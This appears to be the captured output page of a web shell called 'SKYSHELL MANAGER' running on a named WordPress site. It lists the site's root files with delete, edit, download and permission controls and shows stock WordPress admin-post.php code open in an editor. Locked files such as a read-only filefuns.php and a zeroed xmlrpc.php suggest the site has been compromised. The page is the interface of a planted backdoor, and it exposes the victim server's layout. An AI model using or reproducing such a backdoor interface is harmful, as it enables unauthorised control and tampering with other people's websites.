📁
SKYSHELL MANAGER
PHP v8.3.31
Create
Create
Path:
root
/
home
/
nginx
/
domains
/
kingsheadwye.com
/
public
/
Name
Size
Perm
Actions
📁
.claude
-
0770
🗑️
🏷️
🔒
📁
.well-known
-
0770
🗑️
🏷️
🔒
📁
cgi-bin
-
0770
🗑️
🏷️
🔒
📁
wp-admin
-
0775
🗑️
🏷️
🔒
📁
wp-content
-
0775
🗑️
🏷️
🔒
📁
wp-includes
-
0775
🗑️
🏷️
🔒
📄
.htaccess
2 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
.user.ini
0.09 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
CLAUDE.md
4.01 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
6.87 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
filefuns.php
5.68 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
3.31 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.56 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0000
🗑️
🏷️
⬇️
✏️
🔒
Edit: admin-post.php
<?php /** * WordPress Generic Request (POST/GET) Handler * * Intended for form submission handling in themes and plugins. * * @package WordPress * @subpackage Administration */ /** We are located in WordPress Administration Screens */ if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; /** Allow for cross-domain requests (from the front end). */ send_origin_headers(); require_once ABSPATH . 'wp-admin/includes/admin.php'; nocache_headers(); /** This action is documented in wp-admin/admin.php */ do_action( 'admin_init' ); $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; // Reject invalid parameters. if ( ! is_scalar( $action ) ) { wp_die( '', 400 ); } if ( ! is_user_logged_in() ) { if ( empty( $action ) ) { /** * Fires on a non-authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post_nopriv' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_nopriv_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on a non-authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_nopriv_{$action}" ); } } else { if ( empty( $action ) ) { /** * Fires on an authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on an authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_{$action}" ); } }
Save